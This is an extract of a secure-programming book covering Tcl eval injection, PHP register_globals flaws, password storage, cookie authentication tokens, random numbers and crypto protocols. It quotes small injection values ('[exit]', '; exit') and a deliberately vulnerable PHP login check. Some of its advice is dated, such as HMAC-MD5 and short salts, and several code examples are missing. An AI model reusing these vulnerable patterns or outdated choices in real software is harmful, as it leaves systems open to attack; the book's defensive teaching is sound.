Using lrange is useful when concatenating arguments to a called function, e.g., with more complex
libraries using callbacks. In Tcl, eval is often used to create a one-argument version of a function that
takes a variable number of arguments, and you need to be careful when using it this way. Here’s another
example (presuming that you’ve defined a "printf" function):
Fundamentally, when passing a command that will be eventually evaluated, you must pass Tcl
commands as a properly built list, and not as a (possibly concatentated) string. For example, the "after"
command runs a Tcl command after a given number of milliseconds; if the data in $param1 can be
controlled by an attacker, this Tcl code is dangerously wrong:
This is wrong, because if an attacker can control the value of $param1, the attacker can control the
program. For example, if the attacker can cause $param1 to have “[exit]”, then the program will exit.
Also, if $param1 would be “; exit”, it would also exit.
Thus, the proper alternative would be:
Here’s another example showing what you shouldn’t do, pretending that $params is data controlled by
possibly malicious user:
139
Chapter 10. Language-Specific Issues
’TESTSTRING ’
But, when if the untrusted user sends data with an embedded newline, like this:
The result will be this (notice that the attacker’s code was executed!):
HELLOWORLD
’TESTINGSTRING ’
Wojciech Kocjan suggests that the simplest solution in this case is to convert this to a list using lrange,
doing this:
’TESTINGSTRING ’
Note that this solution presumes that the potentially malicious text is concatenated to the end of the text;
as with all languages, make sure the attacker cannot control the format text.
As a matter of style always use curly braces when using if, while, for, expr, and any other command
which parses an argument using expr/eval/subst. Doing this will avoid a common error when using Tcl
called unintended double substitution (aka double substitution). This is best explained by example; the
following code is incorrect:
The code is incorrect because the "![eof $file]" text will be evaluated by the Tcl parser when the while
command is executed the first time, and not re-evaluated in every iteration as it should be. Instead, do
this:
Note that both the condition, and the action to be performed, are surrounded by curly braces. Although
there are cases where the braces are redundant, they never hurt, and when you fail to include the curly
braces where they’re needed (say, when making a minor change) subtle and hard-to-find errors often
result.
More information on good Tcl style can be found in documents such as Ray Johnson’s Tcl Style Guide.
140
Chapter 10. Language-Specific Issues
In the past, I have stated that I don’t recommend Tcl for writing programs which must mediate a security
boundary. Tcl seems to have improved since that time, so while I cannot guarantee Tcl will work for your
needs, I can’t guarantee that any other language will work for you either. Again, my thanks to Wojciech
Kocjan who provided some of these suggestions on how to write Tcl code for secure applications.
10.8. PHP
SecureReality has put out a very interesting paper titled “A Study In Scarlet - Exploiting Common
Vulnerabilities in PHP” [Clowes 2001], which discusses some of the problems in writing secure
programs in PHP, particularly in versions before PHP 4.1.0. Clowes concludes that “it is very hard to
write a secure PHP application (in the default configuration of PHP), even if you try”.
Granted, there are security issues in any language, but one particular issue stands out in older versions of
PHP that arguably makes older PHP versions less secure than most languages: the way it loads data into
its namespace. By default, in PHP (versions 4.1.0 and lower) all environment variables and values sent to
PHP over the web are automatically loaded into the same namespace (global variables) that normal
variables are loaded into - so attackers can set arbitrary variables to arbitrary values, which keep their
values unless explicitly reset by a PHP program. In addition, PHP automatically creates variables with a
default value when they’re first requested, so it’s common for PHP programs to not initialize variables. If
you forget to set a variable, PHP can report it, but by default PHP won’t - and note that this simply an
error report, it won’t stop an attacker who finds an unusual way to cause it. Thus, by default PHP allows
an attacker to completely control the values of all variables in a program unless the program takes special
care to override the attacker. Once the program takes over, it can reset these variables, but failing to reset
any variable (even one not obvious) might open a vulnerability in the PHP program.
For example, the following PHP program (an example from Clowes) intends to only let those who know
the password to get some important information, but an attacker can set “auth” in their web browser and
subvert the authorization check:
<?php
if ($pass == "hello")
$auth = 1;
...
if ($auth == 1)
echo "some important information";
?>
I and many others have complained about this particularly dangerous problem; it’s particularly a problem
because PHP is widely used. A language that’s supposed to be easy to use better make it easy to write
secure programs in, after all. It’s possible to disable this misfeature in PHP by turning the setting
“register_globals” to “off”, but by default PHP versions up through 4.1.0 default set this to “on” and PHP
before 4.1.0 is harder to use with register_globals off. The PHP developers warned in their PHP 4.1.0
announcenment that “as of the next semi-major version of PHP, new installations of PHP will default to
having register_globals set to off.” This has now happened; as of PHP version 4.2.0, External variables
(from the environment, the HTTP request, cookies or the web server) are no longer registered in the
global scope by default. The preferred method of accessing these external variables is by using the new
Superglobal arrays, introduced in PHP 4.1.0.
141
Chapter 10. Language-Specific Issues
PHP with “register_globals” set to “on” is a dangerous choice for nontrivial programs - it’s just too easy
to write insecure programs. However, once “register_globals” is set to “off”, PHP is quite a reasonable
language for development.
The secure default should include setting “register_globals” to “off”, and also including several functions
to make it much easier for users to specify and limit the input they’ll accept from external sources. Then
web servers (such as Apache) could separately configure this secure PHP installation. Routines could be
placed in the PHP library to make it easy for users to list the input variables they want to accept; some
functions could check the patterns these variables must have and/or the type that the variable must be
coerced to. In my opinion, PHP is a bad choice for secure web development if you set register_globals
on.
As I suggested in earlier versions of this book, PHP has been modified to become a reasonable choice for
secure web development. However, note that PHP doesn’t have a particularly good security vulnerability
track record (e.g., register_globals, a file upload problem, and a format string problem in the error
reporting library); I believe that security issues were not considered sufficiently in early editions of PHP;
I also think that the PHP developers are now emphasizing security and that these security issues are
finally getting worked out. One evidence is the major change that the PHP developers have made to get
turn off register_globals; this had a significant impact on PHP users, and their willingness to make this
change is a good sign. Unfortunately, it’s not yet clear how secure PHP really is; PHP just hasn’t had
much of a track record now that the developers of PHP are examining it seriously for security issues.
Hopefully this will become clear quickly.
If you’ve decided to use PHP, here are some of my recommendations (many of these recommendations
are based on ways to counter the issues that Clowes raises):
• Set the PHP configuration option “register_globals” off, and use PHP 4.2.0 or greater. PHP 4.1.0 adds
several special arrays, particularly $_REQUEST, which makes it far simpler to develop software in
PHP when “register_globals” is off. Setting register_globals off, which is the default in PHP 4.2.0,
completely eliminates the most common PHP attacks. If you’re assuming that register_globals is off,
you should check for this first (and halt if it’s not true) - that way, people who install your program
will quickly know there’s a problem. Note that many third-party PHP applications cannot work with
this setting, so it can be difficult to keep it off for an entire website. It’s possible to set register_globals
off for only some programs. For example, for Apache, you could insert these lines into the file
.htaccess in the PHP directory (or use Directory directives to control it further):
php_flag register_globals Off
php_flag track_vars On
However, the .htaccess file itself is ignored unless the Apache web server is configured to permit
overrides; often the Apache global configuration is set so that AllowOverride is set to None. So, for
Apache users, if you can convince your web hosting service to set “AllowOverride Options” in their
configuration file (often /etc/http/conf/http.conf) for your host, do that. Then write helper functions to
simplify loading the data you need (and only that data).
• If you must develop software where register_globals might be on while running (e.g., a
widely-deployed PHP application), always set values not provided by the user. Don’t depend on PHP
default values, and don’t trust any variable you haven’t explicitly set. Note that you have to do this for
every entry point (e.g., every PHP program or HTML file using PHP). The best approach is to begin
each PHP program by setting all variables you’ll be using, even if you’re simply resetting them to the
usual default values (like "" or 0). This includes global variables referenced in included files, even all
libraries, transitively. Unfortunately, this makes this recommendation hard to do, because few
142
Chapter 10. Language-Specific Issues
developers truly know and understand all global variables that may be used by all functions they call.
One lesser alternative is to search through HTTP_GET_VARS, HTTP_POST_VARS,
HTTP_COOKIE_VARS, and HTTP_POST_FILES to see if the user provided the data - but
programmers often forget to check all sources, and what happens if PHP adds a new data source (e.g.,
HTTP_POST_FILES wasn’t in old versions of PHP). Of course, this simply tells you how to make the
best of a bad situation; in case you haven’t noticed yet, turn off register_globals!
• Set the error reporting level to E_ALL, and resolve all errors reported by it during testing. Among
other things, this will complain about un-initialized variables, which are a key issues in PHP. This is a
good idea anyway whenever you start using PHP, because this helps debug programs, too. There are
many ways to set the error reporting level, including in the “php.ini” file (global), the “.htttpd.conf”
file (single-host), the “.htaccess” file (multi-host), or at the top of the script through the error_reporting
function. I recommend setting the error reporting level in both the php.ini file and also at the top of the
script; that way, you’re protected if (1) you forget to insert the command at the top of the script, or (2)
move the program to another machine and forget to change the php.ini file. Thus, every PHP program
should begin like this:
<?php error_reporting(E_ALL);?>
It could be argued that this error reporting should be turned on during development, but turned off
when actually run on a real site (since such error message could give useful information to an
attacker). The problem is that if they’re disabled during “actual use” it’s all too easy to leave them
disabled during development. So for the moment, I suggest the simple approach of simply including it
in every entrance. A much better approach is to record all errors, but direct the error reports so they’re
only included in a log file (instead of having them reported to the attacker).
• Filter any user information used to create filenames carefully, in particular to prevent remote file
access. PHP by default comes with “remote files” functionality -- that means that file-opening
commands like fopen(), that in other languages can only open local files, can actually be used to
invoke web or ftp requests from another site.
• Do not use old-style PHP file uploads; use the HTTP_POST_FILES array and related functions. PHP
supports file uploads by uploading the file to some temporary directory with a special filename. PHP
originally set a collection of variables to indicate where that filename was, but since an attacker can
control variable names and their values, attackers could use that ability to cause great mischief.
Instead, always use HTTP_POST_FILES and related functions to access uploaded files. Note that
even in this case, PHP’s approach permits attackers to temporarily upload files to you with arbitrary
content, which is risky by itself.
• Only place protected entry points in the document tree; place all other code (which should be most of
it) outside the document tree. PHP has a history of unfortunate advice on this topic. Originally, PHP
users were supposed to use the “.inc” (include) extension for “included” files, but these included files
often had passwords and other information, and Apache would just give requesters the contents of the
“.inc” files when asked to do so when they were in the document tree. Then developers gave all files a
“.php” extension - which meant that the contents weren’t seen, but now files never meant to be entry
points became entry points and were sometimes exploitable. As mentioned earlier, the usual security
advice is the best: place only the proected entry points (files) in the document tree, and place other
code (e.g., libraries) outside the document tree. There shouldn’t be any “.inc” files in the document
tree at all.
• Avoid the session mechanism. The “session” mechanism is handy for storing persistent data, but its
current implementation has many problems. First, by default sessions store information in temporary
files - so if you’re on a multi-hosted system, you open yourself up to many attacks and revelations.
143
Chapter 10. Language-Specific Issues
Even those who aren’t currently multi-hosted may find themselves multi-hosted later! You can "tie"
this information into a database instead of the filesystem, but if others on a multi-hosted database can
access that database with the same permissions, the problem is the same. There are also ambiguities if
you’re not careful (“is this the session value or an attacker’s value”?) and this is another case where an
attacker can force a file or key to reside on the server with content of their choosing - a dangerous
situation - and the attacker can even control to some extent the name of the file or key where this data
will be placed.
• Use directives to limit privileges (such as safe_mode, disable_function, and open_basedir), but do not
rely on them. These directives can help limit some simple casual attacks, so they’re worth applying.
However, they’re unlikely to be sufficient to protect against real attacks; they depend only on the
user-space PHP program to do protection, a function it’s not really designed to perform. Instead, you
should employ operating system protections (e.g., running separate processes and users) for serious
protection.
• For all inputs, check that they match a pattern for acceptability (as with any language), and then use
type casting to coerce non-string data into the type it should have. Develop “helper” functions to easily
check and import a selected list of (expected) inputs. PHP is loosely typed, and this can cause trouble.
For example, if an input datum has the value "000", it won’t be equal to "0" nor is it empty(). This is
particularly important for associative arrays, because their indexes are strings; this means that
$data["000"] is different than $data["0"]. For example, to make sure $bar has type double (after
making sure it only has the format legal for a double):
$bar = (double) $bar;
• Be careful of any functions that execute PHP code as strings - make sure attackers cannot control the
string contents. This includes eval(), exec(), include(), passthru(), popen(), preg_replace() when the /e
modifier is used, require(), system(), and the backtick operator.
• Be especially careful of risky functions. For example, this includes functions that open files (e.g.,
fopen(), readfile(), and file()); make sure attackers cannot force the program to open arbitrary files.
Older versions of PHP (prior to 4.3.0) had a buffer overflow vulnerability in the wordwrap() function,
so if you use old versions beware (or even better, upgrade, and make sure your customers upgrade by
checking the version number in the installer).
• Use magic_quotes_gpc() where appropriate - this eliminates many kinds of attacks.
• Avoid file uploads, and consider modifying the php.ini file to disable them (file_uploads = Off). File
uploads have had security holes in the past, so on older PHP’s this is a necessity, and until more
experience shows that they’re safe this isn’t a bad thing to remove. Remember, in general, to secure a
system you should disable or remove anything you don’t need.
144
Chapter 11. Special Topics
Understanding is a fountain of life to
those who have it, but folly brings
punishment to fools.
Proverbs 16:22 (NIV)
11.1. Passwords
Where possible, don’t write code to handle passwords. In particular, if the application is local, try to
depend on the normal login authentication by a user. If the application is a CGI script, try to depend on
the web server to provide the protection as much as possible - but see below about handling
authentication in a web server. If the application is over a network, avoid sending the password as
cleartext (where possible) since it can be easily captured by network sniffers and reused later.
“Encrypting” a password using some key fixed in the algorithm or using some sort of shrouding
algorithm is essentially the same as sending the password as cleartext.
When transmitting passwords over a network, cryptographically authenticate and encrypt the connection.
(Below we will discuss web authentication, which typically uses SSL/TLS to do this.)
When implementing a system that users log in to using passwords (such as many server), never store the
passwords as-is (i.e., never store passwords “in the clear”). A common problem today is that attackers
may be able to briefly break into systems, or acquire data backups; in such cases they can then forge
every user account, at least on that system and typically on many others.
Today, the bare-minimum acceptable method for systems that many users log into using passwords to
use a cryptographic hash that includes per-user salt and uses an intentionally-slow hash function
designed for the purpose. For brevity, these are known as “salted hashes” (though many would use the
term “salted hash” if it only met the first two criteria). Let’s briefly examine what that means, and why
each part is necessary:
• Cryptographic hash: A cryptographic hash function, such as SHA-512, converts data into a
“fingerprint” that is very difficult to invert. If a hash function is used, an attacker cannot just see what
the password is, but instead, must somehow determine the password given the fingerprint.
• Per-user salt: An attacker could counteract simple cryptographic hashes by simply pre-hashing many
common passwords and then seeing if any of the many passwords match one the precomputed hash
values. This can be counteracted by creating, for each user, an additional random value called a salt
that is used as part of the data to be hashed. This data needs to be stored (unencrypted) for each user.
Salt should be generated using a cryptographic pseudo-random number generator, and a it should have
at least 128 bits (per NIST SP 800-132).
• Key derivation / iterated functions: The stored value should be created using a key derivation or key
stretching function; such functions are intentionally slightly slow by iterating some operation many
times. This slowness is designed to be irrelevant in normal operation, but the additional cycles greatly
impede attackers who are trying to do password-guessing on a specific higher-value user account. A
key derivation function repeatedly uses a cryptographic hash, a cipher, or HMAC methods. A really
common key derivation function is PBKDF2 (Password-Based Key Derivation Function 2); this is
145
Chapter 11. Special Topics
RSA Laboratories’ Public-Key Cryptography Standards (PKCS) #5 v2.0, RFC 2898, and in
"Recommendation for Password-Based Key Derivation" NIST Special Publication 800-132. However,
PBKDF2 can be implemented rather quickly in GPUs and specialized hardware, and GPUs in
particular are widely available. Today you should prefer iteration algorithms like bcrypt, which is
designed to better counter attackers using GPUs and specialized hardware.
If your application permits users to set their passwords, check the passwords and permit only “good”
passwords (e.g., not in a dictionary, having certain minimal length, etc.). You may want to look at
information such as http://consult.cern.ch/writeup/security/security_3.html on how to choose a good
password. You should use PAM if you can, because it supports pluggable password checkers.
146
Chapter 11. Special Topics
correctly-working program.
Thus, the most common technique for storing authentication information on the web today is through
cookies. Cookies weren’t really designed for this purpose, but they can be used to support authentication
- but there are many wrong ways to use them that create security vulnerabilities, so be careful. For more
information about cookies, see IETF RFC 2965, along with the older specifications about them. Note
that to use cookies, some browsers (e.g., Microsoft Internet Explorer 6) may insist that you have a
privacy profile (named p3p.xml on the root directory of the server).
Note that some users don’t accept cookies, so this solution still has some problems. If you want to
support these users, you should send this authentication information back and forth via HTML form
hidden fields (since nearly all browsers support them without concern). You’d use the same approach as
with cookies - you’d just use a different technology to have the data sent from the user to the server.
Naturally, if you implement this approach, you need to include settings to ensure that these pages aren’t
cached for use by others. However, while I think avoiding cookies is preferable, in practice these other
approaches often require much more development effort. Since it’s so hard to implement this on a large
scale for many application developers, I’m not currently stressing these approaches. I would rather
describe an approach that is reasonably secure and reasonably easy to implement, than emphasize
approaches that are too hard to implement correctly (by either developers or users). However, if you can
do so without much effort, by all means support sending the authentication information using form
hidden fields and an encrypted link (e.g., SSL/TLS). As with all cookies, for these cookies you should
turn on the HttpOnly flag unless you have a web browser script that must be able to read the cookie.
Fu [2001] discusses client authentication on the web, along with a suggested approach, and this is the
approach I suggest for most sites. The basic idea is that client authentication is split into two parts, a
“login procedure” and “subsequent requests.” In the login procedure, the server asks for the user’s
username and password, the user provides them, and the server replies with an “authentication token”. In
the subsequent requests, the client (web browser) sends the authentication token to the server (along with
its request); the server verifies that the token is valid, and if it is, services the request. Another good
source of information about web authentication is Seifried [2001].
One serious problem with some web authentication techniques is that they are vulnerable to a problem
called "session fixation". In a session fixation attack, the attacker fixes the user’s session ID before the
user even logs into the target server, thus eliminating the need to obtain the user’s session ID afterwards.
Basically, the attacker obtains an account, and then tricks another user into using the attacker’s account -
often by creating a special hypertext link and tricking the user into clicking on it. A good paper
describing session fixation is the paper by Mitja Kolsek [2002]. A web authentication system you use
should be resistant to session fixation.
A good general checklist that covers website authentication is Mark Burnett’s articles on SecurityFocus.
147
Chapter 11. Special Topics
If both the username and password fields are filled in, do not try to automatically log in as that user.
Instead, display the login form with the user and password fields; this lets the user verify that they really
want to log in as that user. If you fail to do this, attackers will be able to exploit this weakness to perform
a session fixation attack. Paranoid systems might want simply ignore the password field and make the
user fill it in, but this interferes with browsers which can store passwords for users.
When the user sends username and password, it must be checked against the user account database. This
database shouldn’t store the passwords “in the clear”, since if someone got a copy of the this database
they’d suddenly get everyone’s password (and users often reuse passwords). Some use crypt() to handle
this, but crypt can only handle a small input, so I recommend using a different approach (this is my
approach - Fu [2001] doesn’t discuss this). Instead, the user database should store a username, salt, and
the password hash for that user. The “salt” is just a random sequence of characters, used to make it
harder for attackers to determine a password even if they get the password database - I suggest an
8-character random sequence. It doesn’t need to be cryptographically random, just different from other
users. The password hash should be computed by concatenating “server key1”, the user’s password, and
the salt, and then running a cryptographically secure hash algorithm. Server key1 is a secret key unique
to this server - keep it separate from the password database. Someone who has server key1 could then
run programs to crack user passwords if they also had the password database; since it doesn’t need to be
memorized, it can be a long and complex password.
Thus, when users create their accounts, the password is hashed and placed in the password database.
When users try to log in, the purported password is hashed and compared against the hash in the database
(they must be equal). When users change their password, they should type in both the old and new
password, and the new password twice (to make sure they didn’t mistype it); and again, make sure none
of these password’s characters are visible on the screen.
By default, don’t save the passwords themselves on the client’s web browser using cookies - users may
sometimes use shared clients (say at some coffee shop). If you want, you can give users the option of
“saving the password” on their browser, but if you do, make sure that the password is set to only be
transmitted on “secure” connections, and make sure the user has to specifically request it (don’t do this
by default).
Make sure that the page is marked to not be cached, or a proxy server might re-serve that page to other
users.
Once a user successfully logs in, the server needs to send the client an “authentication token” in a cookie,
which is described next.
exp=t&data=s&digest=m
Where t is the expiration time of the token (say, in several hours), and data s identifies the user (say, the
user name or session id). The digest is a keyed digest of the other fields. Feel free to change the field
name of “data” to be more descriptive (e.g., username and/or sessionid). If you have more than one field
148
Chapter 11. Special Topics
of data (e.g., both a username and a sessionid), make sure the digest uses both the field names and data
values of all fields you’re authenticating; concatenate them with a pattern (say “%%”, “+”, or “&”) that
can’t occur in any of the field data values. As described in a moment, it would be a good idea to include a
username. The keyed digest should be a cryptographic hash of the other information in the token, keyed
using a different server key2. The keyed digest should use HMAC-MD5 or HMAC-SHA1, using a
different server key (key2), though simply using SHA1 might be okay for some purposes (or even MD5,
if the risks are low). Key2 is subject to brute force guessing attacks, so it should be long (say 12+
characters) and unguessable; it does NOT need to be easily remembered. If this key2 is compromised,
anyone can authenticate to the server, but it’s easy to change key2 - when you do, it’ll simply force
currently “logged in” users to re-authenticate. See Fu [2001] for more details.
There is a potential weakness in this approach. I have concerns that Fu’s approach, as originally
described, is weak against session fixation attacks (from several different directions, which I don’t want
to get into here). Thus, I now suggest modifying Fu’s approach and using this token format instead:
exp=t&data=s&client=c&digest=m
This is the same as the original Fu aproach, and older versions of this book (before December 2002)
didn’t suggest it. This modification adds a new "client" field to uniquely identify the client’s current
location/identity. The data in the client field should be something that should change if someone else
tries to use the account; ideally, its new value should be unguessable, though that’s hard to accomplish in
practice. Ideally the client field would be the client’s SSL client certificate, but currently that’s a suggest
that is hard to meet. At the least, it should be the user’s IP address (as perceived from the server, and
remember to plan for IPv6’s longer addresses). This modification doesn’t completely counter session
fixation attacks, unfortunately (since if an attacker can determine what the user would send, the attacker
may be able to make a request to a server and convince the client to accept those values). However, it
does add resistance to the attack. Again, the digest must now include all the other data.
Here’s an example. If a user logs into foobar.com sucessfully, you might establish the expiration date as
2002-12-30T1800 (let’s assume we’ll transmit as ASCII text in this format for the moment), the
username as "fred", the client session as "1234", and you might determine that the client’s IP address was
5.6.7.8. If you use a simple SHA-1 keyed digest (and use a key prefixing the rest of the data), with the
server key2 value of "rM!V^m~v*Dzx", the digest could be computed over:
exp=2002-12-30T1800&user=fred&session=1234&client=5.6.7.8
A keyed digest can be computed by running a cryptographic hash code over, say, the server key2, then
the data; in this case, the digest would be:
101cebfcc6ff86bc483e0538f616e9f5e9894d94
From then on, the server must check the expiration time and recompute the digest of this authentication
token, and only accept client requests if the digest is correct. If there’s no token, the server should reply
with the user login page (with a hidden form field to show where the successful login should go
afterwards).
It would be prudent to display the username, especially on important screens, to help counter session
fixation attacks. If users are given feedback on their username, they may notice if they don’t have their
expected username. This is helpful anyway if it’s possible to have an unexpected username (e.g., a family
149
Chapter 11. Special Topics
that shares the same machine). Examples of important screens include those when a file is uploaded that
should be kept private.
One odd implementation issue: although the specifications for the "Expires:" (expiration time) field for
cookies permit time zones, it turns out that some versions of Microsoft’s Internet Explorer don’t
implement time zones correctly for cookie expiration. Thus, you need to always use UTC time (also
called Zulu time) in cookie expiration times for maximum portability. It’s a good idea in general to use
UTC time for time values, and convert when necessary for human display, since this eliminates other
time zone and daylight savings time issues.
If you include a sessionid in the authentication token, you can limit access further. Your server could
“track” what pages a user has seen in a given session, and only permit access to other appropriate pages
from that point (e.g., only those directly linked from those page(s)). For example, if a user is granted
access to page foo.html, and page foo.html has pointers to resources bar1.jpg and bar2.png, then accesses
to bar4.cgi can be rejected. You could even kill the session, though only do this if the authentication
information is valid (otherwise, this would make it possible for attackers to cause denial-of-service
attacks on other users). This would somewhat limit the access an attacker has, even if they successfully
hijack a session, though clearly an attacker with time and an authentication token could “walk” the links
just as a normal user would.
One decision is whether or not to require the authentication token and/or data to be sent over a secure
connection (e.g., SSL). If you send an authentication token in the clear (non-secure), someone who
intercepts the token could do whatever the user could do until the expiration time. Also, when you send
data over an unencrypted link, there’s the risk of unnoticed change by an attacker; if you’re worried that
someone might change the data on the way, then you need to authenticate the data being transmitted.
Encryption by itself doesn’t guarantee authentication, but it does make corruption more likely to be
detected, and typical libraries can support both encryption and authentication in a TLS/SSL connection.
In general, if you’re encrypting a message, you should also authenticate it. If your needs vary, one
alternative is to create two authentication tokens - one is used only in a “secure” connection for important
operations, while the other used for less-critical operations. Make sure the token used for “secure”
connections is marked so that only secure connections (typically encrypted SSL/TLS connections) are
used. If users aren’t really different, the authentication token could omit the “data” entirely.
Again, make sure that the pages with this authentication token aren’t cached. There are other reasonable
schemes also; the goal of this text is to provide at least one secure solution. Many variations are possible.
150
Chapter 11. Special Topics
numbers, such as values based on radioactive decay (through precise timing of Geiger counter clicks),
atmospheric noise, or thermal noise in electrical circuits. Some computers have a hardware component
that functions as a real random value generator, and if it’s available you should use it.
However, most computers don’t have hardware that generates truly random values, so in most cases you
need a way to generate random numbers that is sufficiently random that an adversary can’t predict it. In
general, this means that you’ll need three things:
• An “unguessable” state; typically this is done by measuring variances in timing of low-level devices
(keystrokes, disk drive arm jitter, etc.) in a way that an adversary cannot control.
• A cryptographically strong pseudo-random number generator (PRNG), which uses the state to
generate “random” numbers.
• A large number of bits (in both the seed and the resulting value used). There’s no point in having a
strong PRNG if you only have a few possible values, because this makes it easy for an attacker to use
brute force attacks. The number of bits necessary varies depending on the circumstance, however,
since these are often used as cryptographic keys, the normal rules of thumb for keys apply. For a
symmetric key (result), I’d use at least 112 bits (3DES), 128 bits is a little better, and 160 bits or more
is even safer.
Typically the PRNG uses the state to generate some values, and then some of its values and other
unguessable inputs are used to update the state. There are lots of ways to attack these systems. For
example, if an attacker can control or view inputs to the state (or parts of it), the attacker may be able to
determine your supposedly “random” number.
A real danger with PRNGs is that most computer language libraries include a large set of pseudo-random
number generators (PRNGs) which are inappropriate for security purposes. Let me say it again: do not
use typical random number generators for security purposes. Typical library PRNGs are intended for use
in simulations, games, and so on; they are not sufficiently random for use in security functions such as
key generation. Most non-cryptographic library PRNGs are some variation of “linear congruential
generators”, where the “next” random value is computed as "(aX+b) mod m" (where X is the previous
value). Good linear congruential generators are fast and have useful statistical properties, making them
appropriate for their intended uses. The problem with such PRNGs is that future values can be easily
deduced by an attacker (though they may appear random). Other algorithms for generating random
numbers quickly, such as quadratic generators and cubic generators, have also been broken [Schneier
1996]. In short, you have to use cryptographically strong PRNGs to generate random numbers in secure
applications - ordinary random number libraries are not sufficient.
Failing to correctly generate truly random values for keys has caused a number of problems, including
holes in Kerberos, the X window system, and NFS [Venema 1996].
If possible, you should use system services (typically provided by the operating system) that are
expressly designed to create cryptographically secure random values. For example, the Linux kernel
(since 1.3.30) includes a random number generator, which is sufficient for many security purposes. This
random number generator gathers environmental noise from device drivers and other sources into an
entropy pool. When accessed as /dev/random, random bytes are only returned within the estimated
number of bits of noise in the entropy pool (when the entropy pool is empty, the call blocks until
additional environmental noise is gathered). When accessed as /dev/urandom, as many bytes as are
requested are returned even when the entropy pool is exhausted. If you are using the random values for
cryptographic purposes (e.g., to generate a key) on Linux, use /dev/random. *BSD systems also include
/dev/random. Solaris users with the SUNWski package also have /dev/random. Note that if a hardware
151
Chapter 11. Special Topics
random number generator is available and its driver is installed, it will be used instead. More information
is available in the system documentation random(4).
On other systems, you’ll need to find another way to get truly random results. One possibility for other
Unix-like systems is the Entropy Gathering Daemon (EGD), which monitors system activity and hashes
it into random values; you can get it at http://www.lothar.com/tech/crypto. You might consider using a
cryptographic hash function on PRNG outputs. By using a hash algorithm, even if the PRNG turns out to
be guessable, this means that the attacker must now also break the hash function.
If you have to implement a strong PRNG yourself, a good choice for a cryptographically strong (and
patent-unencumbered) PRNG is the Yarrow algorithm; you can learn more about Yarrow from
http://www.counterpane.com/yarrow.html. Some other PRNGs can be useful, but many widely-used ones
have known weaknesses that may or may not matter depending on your application. Before
implementing a PRNG yourself, consult the literature, such as [Kelsey 1998] and [McGraw 2000a]. You
should also examine IETF RFC 1750. NIST has some useful information; see the NIST publication
800-22 and NIST errata. You should know about the diehard tests too. You might want to examine the
paper titled "how Intel checked its PRNG", but unfortunately that paper appears to be unavailable now.
152
Chapter 11. Special Topics
then reused, possibly a far time in the future). Instead, in Java use char[] to store a password, so it can be
immediately overwritten. In Ada, use type String (an array of characters), and not type
Unbounded_String, to make sure that you have control over the contents.
In many languages (including C and C++), be careful that the compiler doesn’t optimize away the "dead
code" for overwriting the value - since in this case it’s not dead code. Many compilers, including many
C/C++ compilers, remove writes to stores that are no longer used - this is often referred to as "dead store
removal." Unfortunately, if the write is really to overwrite the value of a secret, this means that code that
appears to be correct will be silently discareded. Ada provides the pragma Inspection_Point; place this
after the code erasing the memory, and that way you can be certain that the object containing the secret
will really be erased (and that the the overwriting won’t be optimized away).
A Bugtraq post by Andy Polyakov (November 7, 2002) reported that the C/C++ compilers gcc version 3
or higher, SGI MIPSpro, and the Microsoft compilers eliminated simple inlined calls to memset intended
to overwrite secrets. This is allowed by the C and C++ standards. Other C/C++ compilers (such as gcc
less than version 3) preserved the inlined call to memset at all optimization levels, showing that the issue
is compiler-specific. Simply declaring that the destination data is volatile doesn’t help on all compilers;
both the MIPSpro and Microsoft compilers ignored simple "volatilization". Simply "touching" the first
byte of the secret data doesn’t help either; he found that the MIPSpro and GCC>=3 cleverly nullify only
the first byte and leave the rest intact (which is actually quite clever - the problem is that the compiler’s
cleverness is interfering with our goals). One approach that seems to work on all platforms is to write
your own implementation of memset with internal "volatilization" of the first argument (this code is
based on a workaround proposed by Michael Howard):
Then place this definition into an external file to force the function to be external (define the function in a
corresponding .h file, and #include the file in the callers, as is usual). This approach appears to be safe at
any optimization level (even if the function gets inlined).
153
Chapter 11. Special Topics
secure. When you must create anything, give the approach wide public review and make sure that
professional security analysts examine it for problems. In particular, do not create your own encryption
algorithms unless you are an expert in cryptology, know what you’re doing, and plan to spend years in
professional review of the algorithm. Creating encryption algorithms (that are any good) is a task for
experts only.
A number of algorithms are patented; even if the owners permit “free use” at the moment, without a
signed contract they can always change their minds later, putting you at extreme risk later. In general,
avoid all patented algorithms - in most cases there’s an unpatented approach that is at least as good or
better technically, and by doing so you avoid a large number of legal problems.
Another complication is that many counties regulate or restrict cryptography in some way. A survey of
legal issues is available at the “Crypto Law Survey” site, http://rechten.kub.nl/koops/cryptolaw/.
Often, your software should provide a way to reject “too small” keys, and let the user set what “too
small” is. For RSA keys, 512 bits is too small for use. There is increasing evidence that 1024 bits for
RSA keys is not enough either; Bernstein has suggested techniques that simplify brute-forcing RSA, and
other work based on it (such as Shamir and Tromer’s "Factoring Large Numbers with the TWIRL
device") now suggests that 1024 bit keys can be broken in a year by a $10 Million device. You may want
to make 2048 bits the minimum for RSA if you really want a secure system. For more about RSA
specifically, see RSA’s commentary on Bernstein’s work. For a more general discussion of key length and
other general cryptographic algorithm issues, see NIST’s key management workshop in November 2001.
• Internet Protocol Security (IPSec). IPSec provides encryption and/or authentication at the IP packet
level. However, IPSec is often used in a way that only guarantees authenticity of two communicating
hosts, not of the users. As a practical matter, IPSec usually requires low-level support from the
operating system (which not all implement) and an additional keyring server that must be configured.
Since IPSec can be used as a "tunnel" to secure packets belonging to multiple users and multiple hosts,
it is especially useful for building a Virtual Private Network (VPN) and connecting a remote machine.
As of this time, it is much less often used to secure communication from individual clients to servers.
The new version of the Internet Protocol, IPv6, comes with IPSec “built in,” but IPSec also works with
the more common IPv4 protocol. Note that if you use IPSec, don’t use the encryption mode without
the authentication, because the authentication also acts as integrity protection.
• Secure Socket Layer (SSL) / TLS. SSL/TLS works over TCP and tunnels other protocols using TCP,
adding encryption, authentication of the server, and optional authentication of the client (but
authenticating clients using SSL/TLS requires that clients have configured X.509 client certificates,
something rarely done). SSL version 3 is widely used; TLS is a later adjustment to SSL that
strengthens its security and improves its flexibility. Currently there is a slow transition going on from
SSLv3 to TLS, aided because implementations can easily try to use TLS and then back off to SSLv3
without user intervention. Unfortunately, a few bad SSLv3 implementations cause problems with the
backoff, so you may need a preferences setting to allow users to skip using TLS if necessary. Don’t
use SSL version 2, it has some serious security weaknesses.
154
Chapter 11. Special Topics
SSL/TLS is the primary method for protecting http (web) transactions. Any time you use an "https://"
URL, you’re using SSL/TLS. Other protocols that often use SSL/TLS include POP3 and IMAP.
SSL/TLS usually use a separate TCP/IP port number from the unsecured port, which the IETF is a
little unhappy about (because it consumes twice as many ports; there are solutions to this). SSL is
